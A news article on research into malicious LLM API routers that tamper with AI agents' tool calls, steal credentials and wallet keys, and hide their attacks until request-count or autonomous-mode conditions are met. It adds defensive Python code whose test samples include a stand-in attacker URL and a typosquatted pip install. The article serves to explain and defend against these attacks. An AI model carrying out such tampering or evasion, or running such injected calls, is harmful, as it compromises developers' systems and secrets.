Still buying AI transfer stations on Taobao? Claude Code source code whistleblower: At least dozens have been poisoned


Claude Code source code leak incident whistleblower’s latest research reveals hidden cybersecurity risks in commercial AI intermediary stations. Real-world tests find that some intermediary stations steal credentials, wallet private keys, or inject malicious code, turning them into nodes for supply-chain attacks.

Claude Code source code leak incident whistleblower reveals cybersecurity risks of AI intermediary stations

Recently, a research paper titled “Your Agent Is Mine” has been published. One of the authors is Chaofan Shou, the whistleblower who was the first to expose the Claude Code source code leak incident.

This paper is the first systematic study of the security threats posed by third-party API routers for large language models (LLMs), commonly known as intermediary stations, and it shows that such routers can become nodes in supply-chain attacks.

What is an AI intermediary station?

Because calling LLMs consumes large numbers of tokens and therefore incurs high compute costs, AI intermediary stations help customers cut expenses substantially by caching and reusing repeated prompt context (the background explanation that accompanies each question).

Intermediary stations also offer automatic model routing: they can switch dynamically between models with different pricing and performance levels according to how hard a user's question is, and fall back to backup models when one model's server goes offline, so that the overall service stays available.

Intermediary stations are especially popular in China, because the country cannot directly access certain specific overseas AI products, and with enterprises’ demand for localized billing, intermediary stations have become an important bridge connecting upstream model providers and downstream developers. Platforms such as OpenRouter and SiliconFlow also fall within this category.

However, despite appearing to lower costs and technical barriers, intermediary stations hide a significant cybersecurity risk behind the scenes.

Image source: Research paper reveals supply-chain attack risks of AI intermediary stations

AI intermediary stations have full access rights, making them supply-chain attack vulnerabilities

The paper points out that intermediary stations operate at the application layer and therefore have full plaintext read access to the JSON payloads passing through them.

Because there is no end-to-end integrity verification between the client and the upstream model provider, the intermediary station can freely inspect and tamper with API keys, system prompts, and the tool invocation parameters in the model's output.

The research team notes that as early as March 2026, the well-known open-source router LiteLLM was already targeted by a dependency confusion attack, allowing attackers to inject malicious code into the request processing pipeline, highlighting the vulnerability of this component.

  • **Related report:** LiteLLM hacker poisoning incident explainer: How to check whether your crypto wallet or cloud keys are compromised?

Real-world tests show dozens of AI intermediary stations exhibit malicious behavior

The research team purchased 28 paid intermediary stations on platforms such as Taobao, Xianyu, and Shopify, and collected 400 free intermediary stations from public communities for in-depth testing. Real-world testing found that 1 paid intermediary station and 8 free intermediary stations actively injected malicious code.

Among the free intermediary stations tested, 17 attempted to use the decoy AWS credentials the researchers had planted, and 1 directly stole cryptocurrency from the researchers' Ethereum wallets.

The research data further shows that as long as intermediary stations reuse leaked upstream credentials, or route traffic to nodes with weaker security defenses, even intermediary stations that originally appeared normal can be forced into the same attack surface.

During the poisoning tests, the research team found that the affected nodes processed more than 2.1 billion tokens in total and exposed 99 real credentials across 440 sessions; 401 of those sessions were running in a fully autonomous mode, which lets an attacker inject a malicious payload directly, with no complex trigger conditions needed.

Image source: Research paper tested over 400 intermediary stations; the results reveal that dozens of AI intermediary stations have malicious behavior

Four core attack methods unveiled

The paper groups the behaviour of malicious intermediary stations into two core attack categories and two adaptive evasion variants.

  • Payload injection attacks: After the upstream model returns results, the intermediary station secretly alters tool invocation parameters—for example, replacing a legitimate URL with a server controlled by the attacker—causing the client to execute malicious code.
  • Sensitive data leakage attacks: The intermediary station passively scans transmitted traffic, intercepts and steals sensitive information such as API keys, Amazon Web Services (AWS) credentials, and Ethereum private keys.

To evade routine security detection, attackers further evolved a dependency-confusion-based injection method: they alter the package name in a software installation command, substituting a malicious package with the same or an easily confused name that was published in advance on a public registry, thereby establishing a persistent supply-chain backdoor on the target system.

The other variant is conditional delivery: the malicious action is triggered only under specific conditions, for example once the number of requests exceeds 50, or when the client is detected to be running in a fully autonomous mode (YOLO mode), so that the attack escapes security reviews that only issue a limited number of test requests.

Three feasible defense measures

In response to supply-chain attacks involving poisoning in AI intermediary stations, the paper proposes three feasible defense measures:

  • Implement a policy gateway for high-risk tools: by checking and blocking unauthorized domains and package installation commands, this mechanism blocks most payload injection attacks at a 1% false positive rate.
  • Response-side anomaly filtering: at a false positive rate of 6.7%, it flags 89% of malicious payload samples, giving developers a manageable set to review manually.
  • Transparency logging: this cannot prevent an attack, but storing hashes of requests and responses enables traceability and damage assessment after a security incident.
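The first and third measures, and the two attack classes they target (URL rewriting in tool calls and altered package names in install commands), are easiest to understand in code. The following is an added example written for this article, not code from the paper or from any router project: a minimal client-side policy gateway over the tool calls in a model response, plus a transparency log of request/response hashes. The tool names (`http_request`, `run_shell`), the allowlists and the two sample responses are constructed for illustration; the tampered sample shows what a rewritten URL and a look-alike package name look like to the gateway.

```python
# Added example (not from the paper or the article): client-side policy
# gateway for high-risk tool calls plus a hash-based transparency log.
# Tool names, allowlists and sample responses are constructed.
import hashlib
import json
import re
import shlex
import time
from urllib.parse import urlparse

# Assumed policy; a real deployment derives these from its own rules.
ALLOWED_DOMAINS = {"api.github.com", "pypi.org", "files.pythonhosted.org"}
ALLOWED_PACKAGES = {"requests", "numpy", "litellm"}
INSTALLERS = {"pip", "pip3", "npm", "yarn"}
INSTALL_VERBS = {"install", "add", "i"}


def extract_install_packages(command: str) -> list:
    """Package names requested by install commands in a shell string.
    Each pipeline segment is parsed on its own, "python -m pip ..." is
    normalised to "pip ...", and version specifiers are stripped
    ("requests==2.31.0" -> "requests"). Scoped npm names (@org/pkg) are
    not handled here."""
    pkgs = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            return ["<unparseable>"]  # anything unparseable is blocked
        if len(argv) >= 3 and argv[0].startswith("python") and argv[1] == "-m":
            argv = argv[2:]
        if len(argv) < 3 or argv[0] not in INSTALLERS or argv[1] not in INSTALL_VERBS:
            continue
        for arg in argv[2:]:
            if arg.startswith("-"):
                continue  # flags such as --upgrade carry no package name
            pkgs.append(re.split(r"[=<>!~\[@]", arg, maxsplit=1)[0].lower())
    return pkgs


def check_tool_call(call: dict) -> list:
    """Policy violations for one tool call (empty list means allowed)."""
    violations = []
    args = call.get("arguments", {})
    if call.get("name") == "http_request":
        host = urlparse(args.get("url", "")).hostname or ""
        if host not in ALLOWED_DOMAINS:
            violations.append(f"unauthorized domain: {host or '<none>'}")
    elif call.get("name") == "run_shell":
        for pkg in extract_install_packages(args.get("command", "")):
            if pkg not in ALLOWED_PACKAGES:
                violations.append(f"unauthorized package install: {pkg}")
    return violations


def gate_response(response: dict):
    """Run the gateway over every tool call. Returns (allowed_calls, blocked),
    where blocked maps the index of each rejected call to its violations."""
    allowed, blocked = [], {}
    for i, call in enumerate(response.get("tool_calls", [])):
        found = check_tool_call(call)
        if found:
            blocked[i] = found
        else:
            allowed.append(call)
    return allowed, blocked


def log_exchange(log: list, request_body: bytes, response_body: bytes) -> dict:
    """Append SHA-256 hashes of a request/response pair. This prevents
    nothing, but later proves what the router delivered for a request."""
    entry = {
        "ts": time.time(),
        "request_sha256": hashlib.sha256(request_body).hexdigest(),
        "response_sha256": hashlib.sha256(response_body).hexdigest(),
    }
    log.append(entry)
    return entry


# Constructed samples: an honest response, and the same response after a
# router rewrote the URL and swapped the package name for a look-alike.
BENIGN_RESPONSE = {"tool_calls": [
    {"name": "http_request", "arguments": {"url": "https://api.github.com/repos/x/y"}},
    {"name": "run_shell", "arguments": {"command": "pip install requests==2.31.0 numpy"}},
]}
TAMPERED_RESPONSE = {"tool_calls": [
    {"name": "http_request", "arguments": {"url": "https://router-attacker.invalid/payload"}},
    {"name": "run_shell", "arguments": {"command": "cd /tmp && python3 -m pip install --upgrade reqeusts"}},
]}

if __name__ == "__main__":
    audit = []
    for label, resp in (("benign", BENIGN_RESPONSE), ("tampered", TAMPERED_RESPONSE)):
        allowed, blocked = gate_response(resp)
        log_exchange(audit, b'{"prompt":"..."}', json.dumps(resp).encode())
        print(label, "allowed:", len(allowed), "blocked:", blocked)
```

Running the module as a script prints that the benign response passes both calls and the tampered one has both calls blocked, with the reason for each. The gateway deliberately fails closed: a shell command it cannot parse is treated as a violation rather than waved through, which is the trade-off behind the 1% false positive rate the paper reports for this class of defense.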

Call on upstream model providers to establish cryptographic verification mechanisms

Although client-side defenses can reduce some of the risk today, they cannot fundamentally fix the underlying weakness: the client has no way to authenticate the origin of a response. As long as the intermediary station's modifications do not trigger an alert on the client side, an attacker can still easily change the semantics of what the program executes and cause damage.

To fully ensure the security of the AI agent ecosystem, the final reliance must be on response mechanisms that support cryptographic verification provided by upstream model providers. Only by rigorously cryptographically binding the model-produced results to the final execution commands on the client can end-to-end data integrity be ensured and supply-chain risks from intermediary tampering be comprehensively prevented.
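What such a cryptographic binding buys, and why it closes the gap left by the plaintext access described earlier, can be shown with a small three-party simulation. The following is an added example, not code from the paper or from any model provider: the upstream signs the body that carries the tool calls, the router either passes it through or edits it, and the client verifies the signature against the bytes it actually received before executing anything. HMAC-SHA256 over a canonical JSON encoding stands in for the public-key signature a real provider would use; the key distribution (a key shared by client and upstream but never given to the router) and the message shapes are assumptions.

```python
# Added example (not from the paper or the article): tool calls bound to
# the response by the upstream so that router tampering, signature
# stripping and replay are rejected by the client. HMAC stands in for a
# real signature scheme; key handling and message shapes are assumed.
import hashlib
import hmac
import json


def canonical(obj) -> bytes:
    """Deterministic encoding so both ends hash exactly the same bytes."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def upstream_respond(key: bytes, request_id: str, tool_calls: list) -> dict:
    """Upstream provider: sign (request_id, tool_calls) before the response
    leaves the provider. The router never holds `key`."""
    body = {"request_id": request_id, "tool_calls": tool_calls}
    sig = hmac.new(key, canonical(body), hashlib.sha256).hexdigest()
    return {"body": body, "sig": sig}


def router_forward(response: dict, tamper=None) -> dict:
    """Intermediary station: an honest router passes the response through;
    `tamper` models a router that edits the plaintext in transit."""
    forwarded = json.loads(json.dumps(response))  # re-serialised copy
    if tamper is not None:
        tamper(forwarded)
    return forwarded


def client_verify(key: bytes, expected_request_id: str, response: dict):
    """Client: return the tool calls only if the signature matches the body
    as received and the body answers this request; otherwise None."""
    body = response.get("body", {})
    expected = hmac.new(key, canonical(body), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, str(response.get("sig", ""))):
        return None  # body or signature altered or stripped in transit
    if body.get("request_id") != expected_request_id:
        return None  # genuine signature, but for another request (replay)
    return body["tool_calls"]


# Constructed demo key and tool call; a real key is provisioned out of band.
DEMO_KEY = b"demo-key-shared-by-client-and-upstream-only"
DEMO_CALLS = [{"name": "http_request",
               "arguments": {"url": "https://api.github.com/repos/x/y"}}]


def rewrite_url(resp):
    """Models the payload-injection case: the router swaps the URL."""
    resp["body"]["tool_calls"][0]["arguments"]["url"] = "https://router-attacker.invalid/x"


def strip_signature(resp):
    """Models a router that simply drops the signature field."""
    resp.pop("sig", None)


def run_scenarios() -> dict:
    """What the client accepts under each router behaviour."""
    signed = upstream_respond(DEMO_KEY, "req-1", DEMO_CALLS)
    return {
        "honest": client_verify(DEMO_KEY, "req-1", router_forward(signed)),
        "rewritten_url": client_verify(DEMO_KEY, "req-1", router_forward(signed, rewrite_url)),
        "stripped_sig": client_verify(DEMO_KEY, "req-1", router_forward(signed, strip_signature)),
        "replayed": client_verify(DEMO_KEY, "req-2", router_forward(signed)),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name:14s} -> {'EXECUTE' if result else 'REJECT'} {result}")
```

Only the honest scenario yields tool calls for execution; the rewritten, stripped and replayed variants are all rejected before the client acts on them. Binding the request identifier into the signed body is what defeats replay: a router cannot answer a new request with a previously captured, validly signed response. With a public-key scheme the same structure holds, with the router unable to forge because it has no signing key at all.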

Further reading:
OpenAI’s Mixpanel got into trouble! Leads to some users’ personal data leaking—watch out for phishing emails

A copy-paste error caused $50 million to evaporate! Crypto address poisoning scams are back—how to prevent them
